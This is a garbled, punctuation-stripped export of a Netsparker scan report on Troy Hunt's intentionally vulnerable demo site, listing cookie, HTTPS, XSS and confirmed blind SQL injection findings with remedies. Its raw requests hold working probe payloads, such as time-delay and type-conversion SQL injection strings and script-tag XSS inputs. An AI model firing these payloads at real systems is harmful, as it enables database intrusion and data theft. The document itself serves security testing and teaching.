ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
4 57
5 TOTALCRITICAL
CONFIRMED
5
1 Blind SQL InjectionNetsparkeridentifiedablindSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabaseInthesetestsSQLinjectionwasnotobviousbutthedifferentresponsesfromthepagebasedontheinjectiontestallowedustoidentifyandconfirmtheSQLinjection
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocatethealldynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM change alllegacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
11 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
5 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
